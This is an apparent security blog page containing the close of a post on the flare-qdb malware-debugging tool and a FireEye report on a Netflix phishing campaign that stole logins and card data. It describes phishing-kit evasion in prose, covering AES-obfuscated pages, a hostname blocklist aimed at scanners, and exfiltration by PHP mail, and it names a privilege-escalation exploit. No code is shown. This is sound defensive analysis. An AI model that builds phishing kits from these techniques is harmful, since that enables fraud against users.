Figure 1: Using flareqdb to monitor a string within a loop

Another example is challenge 4 from the 2016 FLARE-On Challenge (spoiler alert: partial solution presented below, full walkthrough is here).

In flareon2016challenge.dll, a decoded PE file contains a series of calls to kernel32!Beep that must be tracked in order to construct the correct sequence of calls to ordinal #50 in the challenge binary. Figure 2 shows a flareqdb one-liner that forwards each kernel32!Beep call to ordinal #50 in the challenge binary to obtain the flag.

Figure 2: Using flareqdb to solve challenge 4 of the 2016 FLARE-On Challenge

flareqdb can also force branches to be taken, evaluate function pointer values, and validate suspected function addresses by disassembling. For example, consider the subroutine in Figure 3, which is only invoked if a set of conditions is satisfied and which calls a C++ virtual function. Identifying this function could help the analyst identify its caller and discover what kind of data to provide through the command and control (C2) channel to exercise it.

Figure 3: Unidentified function with virtual function call

Using the flareqdb command-line utility, it is possible to divert the program counter to bypass checks on the C2 data that was provided and subsequently dump the address of the function pointer that is called by the malware at program counter 0x4029a4. Thanks to vivisect, flare-qdb can even disassemble the instructions at the resulting address to validate that it is indeed a function. Figure 4 shows the flareqdb command-line utility being used to force control flow at 0x4016b5 to proceed to 0x4016bb (not shown) and later to dump the function pointer called at 0x4029a4.

Figure 4: Forcing a branch and resolving a C++ virtual function call

The function pointer resolves to 0x402f32, which IDA has already labeled as basic_streambuf::xsputn as shown in Figure 5. This function inserts a series of characters into a file stream, which suggests a file write capability that might be exercised by providing a filename and/or file data via the C2 channel.

Figure 5: Resolved virtual function address

Using the flareqdb Python Module

flare-qdb also exists as a Python module that is useful for more complex cases. flare-qdb allows for ready use of the powerful vivisect library. Consider the logic in Figure 6, which is part of a privilege escalation tool. The tool checks GetVersionExW, NetWkstaGetInfo, and IsWow64Process before exploiting CVE-2016-0040 in WMI.

Figure 6: Privilege escalation platform check

It appears as if the tool exploits 32-bit Windows installations with version numbers 5.1+, 6.0, and 6.1. Figure 7 shows a script to quickly validate this by executing the tool 12 times, simulating different versions returned from GetVersionExW and NetWkstaInfo. Each time the script executes the malware, it indicates whether the malware reached the point of attempting the privilege escalation or not. The script passes a dictionary of local variables to the Qdb instance for each execution in order to permit the user callback to print the friendly name of each Windows version it is simulating for the binary. The results of GetVersionExW are modified prior to return using the vstruct definition of the OSVERSIONINFOEXW; NetWkstaGetInfo is fixed manually for brevity and in the absence of a definition corresponding to the WKSTA_INFO_100 structure.

Figure 7: Script to test version check

Figure 8 shows the output, which confirms the analysis of the logic from Figure 6.

Figure 8: Script output

Next, consider an example in which the analyst must devise a repeatable process to unpack a binary and ascertain the locations of unpacked PE-COFF files injected throughout memory. The script in Figure 9 does this by setting a breakpoint relative to the tail call and using vivisect’s envi module to enumerate all the RWX memory locations that are not backed by a named file. It then uses flare-qdb’s park() builtin before calling detach() so that the binary runs in an endless loop, allowing the analyst to attach a debugger and resume manual analysis.

Figure 9: Unpacker script that parks its debuggee after unpacking is complete

Figure 10 shows the script announcing the locations of the self-injected modules before parking the process in an infinite loop and detaching.

Figure 10: Result of unpacker script

Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb. The park() builtin stored the original program counter value in the bytes following the jmp instruction. The analyst can return the program to its original location by referring to those bytes and entering the WinDbg command r eip=1DC129B.

Figure 11: Attaching to the parked process

The parked process makes it convenient to snapshot the malware execution VM and repeatedly connect remotely to exercise and annotate different code areas with IDA Pro as the debugger. Because the same OS process can be reused for multiple debug sessions, the memory map announced by the script remains the same across debugging sessions. This means that the annotations created in IDA Pro remain relevant instead of becoming disconnected from the varying data and code locations that would result from the non-deterministic heap addresses returned by VirtualAlloc if the program were simply executed multiple times.

Conclusion

flare-qdb provides a command-line tool to quickly query dynamic binary state without derailing the thought process of an ongoing debugging session. In addition to querying state, flare-qdb can be used to alter program state and simulate new scenarios. For intricate cases, flare-qdb has a scripting interface permitting almost arbitrary manipulation. This can be useful for string decoding, malware unpacking, and general software analysis. Head over to the flare-qdb github page to get started using it.

Credit Card Data and Other Information Targeted in Netflix Phishing Campaign

9 January 2017 at 16:00
Introduction

Through FireEye’s Email Threat Prevention (ETP) solution, FireEye Labs discovered a phishing campaign in the wild targeting the credit card data and other personal information of Netflix users primarily based in the United States.

This campaign is interesting because of the evasion techniques that were used by the attackers:

  • The phishing pages were hosted on legitimate, but compromised web servers.
  • Client-side HTML code was obfuscated with AES encryption to evade text-based detection.
  • Phishing pages were not displayed to users from certain IP addresses if its DNS resolved to companies such as Google or PhishTank.

At the time of posting, the phishing websites we observed were no longer active.

Attack Flow

The attack seems to start with an email notification – sent by the attackers – that asks the user to update their Netflix membership details. The phishing link inside the email body directs recipients to a page that attempts to mimic a Netflix login page, as seen in Figure 1.

Figure 1: Fake login page mimicking the Netflix website

Upon submitting their credentials, victims are then directed to webpages requesting additional membership details (Figure 2) and payment information (Figure 3). These websites also attempt to mimic authentic Netflix webpages and appear legitimate. Once the user has entered their information, they are taken to the legitimate Netflix homepage.

Figure 2: Fake webpage asking users to update their personal details

Figure 3: Netflix phishing webpage used to steal credit card information

Technical Details

The phishing kit uses techniques to evade phishing filters. One technique is the use of AES encryption to encode the content presented at the client’s side, as seen in Figure 4. The purpose of using this technique is code obfuscation, which helps to evade text-based detection. By obfuscating the webpage, attackers try to deceive text-based classifiers and prevent them from inspecting webpage content. This technique employs two files, a PHP and a JavaScript file that have functions to encrypt and decrypt input strings. The PHP file is used to encrypt the webpages at the server side, as seen in Figure 5. At the client side, the encrypted content is decoded using a defined function in the JavaScript file, as seen in Figure 6. Finally, the webpage is rendered using the ‘document.write’ function.

Figure 4: Client-side code obfuscation using AES encryption

Figure 5: PHP code used at server side for encryption

Figure 6: JavaScript code used at client-side for decryption

Another technique is the host-based evasion, as seen in Figure 7. The host name of organizations such as ‘phishtank’ and ‘google’ are blacklisted. The host name of the client is compared against a list of blacklisted host names. If there is a match against the blacklist, a “404 Not Found” error page is presented.

Figure 7: Server side code for blacklisting known hosts. Click image to enlarge.

As with the majority of phishing attacks, this campaign uses PHP mail utility to send the attacker the stolen credentials. The advantage of using this technique is that the attacker can host their phishing kits on a number of websites and still get the stolen credentials and other information from a single email account. This enables attackers to extend their reach.

Figure 8: Stolen information is sent to an email address using mail() function

Tips to Secure your Netflix Account

To learn more about securing your Netflix account, Netflix provides additional information on how to keep your account safe from phishing scams and other fraudulent activity at https://www.netflix.com/security.

❌
❌